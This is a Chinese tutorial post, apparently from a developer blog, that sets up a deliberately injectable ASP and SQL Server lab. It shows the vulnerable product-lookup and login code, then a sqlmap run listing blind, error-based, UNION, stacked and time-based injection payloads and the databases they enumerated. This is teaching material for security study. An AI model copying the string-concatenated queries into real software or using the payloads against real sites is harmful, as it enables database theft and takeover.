<%
dim prodId
prodId = Request.QueryString("id")
set conn = server.createObject("ADODB.Connection")
set rs = server.createObject("ADODB.Recordset")
query = "select prodName from products where id = " & prodId
conn.Open "Provider=SQLOLEDB; Data Source=(local); Initial Catalog=数据库; User Id=sa; Password=密码"
rs.activeConnection = conn
rs.open query
if not rs.eof then
response.write "Got product " & rs.fields("prodName").value
else
response.write "No product found"
end if
%>
SQL语句: 创建一个数据库,然后查询这些
create table products
(
id int identity(1,1) not null,
prodName varchar(50) not null,
)
insert into products(prodName) values('1')
insert into products(prodName) values('2')
insert into products(prodName) values('3')
root@Dis9Team:/pen# sqlmap -u "http://5.5.5.134/sql.asp?id=1" --dbs
sqlmap/1.0-dev (r4911) - automatic SQL injection and database takeover tool
http://www.2cto.com
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 13:10:54
[13:10:55] [INFO] using '/pen/sqlmap-dev/output/5.5.5.134/session' as session file
[13:10:55] [INFO] resuming back-end DBMS 'microsoft sql server 2005' from session file
[13:10:55] [INFO] testing connection to the target url
[13:10:55] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 2431=2431
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: id=1 AND 5223=CONVERT(INT,(CHAR(58)+CHAR(106)+CHAR(107)+CHAR(99)+CHAR(58)+(SELECT (CASE WHEN (5223=5223) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(111)+CHAR(107)+CHAR(122)+CHAR(58)))
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: id=-3220 UNION SELECT CHAR(58)+CHAR(106)+CHAR(107)+CHAR(99)+CHAR(58)+CHAR(107)+CHAR(102)+CHAR(75)+CHAR(122)+CHAR(97)+CHAR(84)+CHAR(120)+CHAR(83)+CHAR(79)+CHAR(83)+CHAR(58)+CHAR(111)+CHAR(107)+CHAR(122)+CHAR(58)--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=1; WAITFOR DELAY '0:0:5';--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=1 WAITFOR DELAY '0:0:5'--
---
[13:10:55] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows XP
web application technology: ASP, Microsoft IIS 5.1
back-end DBMS: Microsoft SQL Server 2005
[13:10:55] [INFO] fetching database names
[13:10:55] [INFO] the SQL query used returns 5 entries
[13:10:55] [INFO] retrieved: "master"
[13:10:55] [INFO] retrieved: "model"
[13:10:55] [INFO] retrieved: "msdb"
[13:10:55] [INFO] retrieved: "myDB"
[13:10:55] [INFO] retrieved: "tempdb"
available databases [5]:
[*] master
[*] model
[*] msdb
[*] myDB
[*] tempdb
[13:10:55] [INFO] Fetched data logged to text files under '/pen/sqlmap-dev/output/5.5.5.134'
[*] shutting down at 13:10:55
root@Dis9Team:/pen#
---------------------------------------------------伟大的分割线--
post sql
sql:
<PRE class="brush:php; toolbar: true; auto-links: true;">create table users
(
userId int identity(1,1) not null,
userName varchar(50) not null,
userPass varchar(20) not null
)
insert into users(userName, userPass) values('john', 'doe')
insert into users(userName, userPass) values('admin', 'wwz04ff')
insert into users(userName, userPass) values('fsmith', 'mypassword')</PRE>
view source
print?
asp:
view source
print?
<PRE class="brush:php; toolbar: true; auto-links: true;"><%
dim userName, password, query
dim conn, rS
userName = Request.Form("userName")
password = Request.Form("password")
set conn = server.createObject("ADODB.Connection")
set rs = server.createObject("ADODB.Recordset")
query = "select count(*) from users where userName='" &
userName & "' and userPass='" & password & "'"
conn.Open "Provider=SQLOLEDB; Data Source=(local);
Initial Catalog=myDB; User Id=sa; Password="
rs.activeConnection = conn
rs.open query
if not rs.eof then
response.write "Logged In"
else
response.write "Bad Credentials"
end if
%>
</PRE>HTML提交表单:<PRE class="brush:php; toolbar: true; auto-links: true;"><DIV class="postmessage firstpost"><PRE class="brush:php; toolbar: true; auto-links: true;"><form name="frmLogin" action="ASP.asp" method="post">
Username: <input type="text" name="userName">
Password: <input type="text" name="password"><input type="submit"></form></PRE></DIV></PRE>
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· Linux系列:如何用 C#调用 C方法造成内存泄露
· AI与.NET技术实操系列(二):开始使用ML.NET
· 记一次.NET内存居高不下排查解决与启示
· 探究高空视频全景AR技术的实现原理
· 理解Rust引用及其生命周期标识(上)
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· .NET 10首个预览版发布:重大改进与新特性概览!
· 单线程的Redis速度为什么快?
· 展开说说关于C#中ORM框架的用法!
· Pantheons:用 TypeScript 打造主流大模型对话的一站式集成库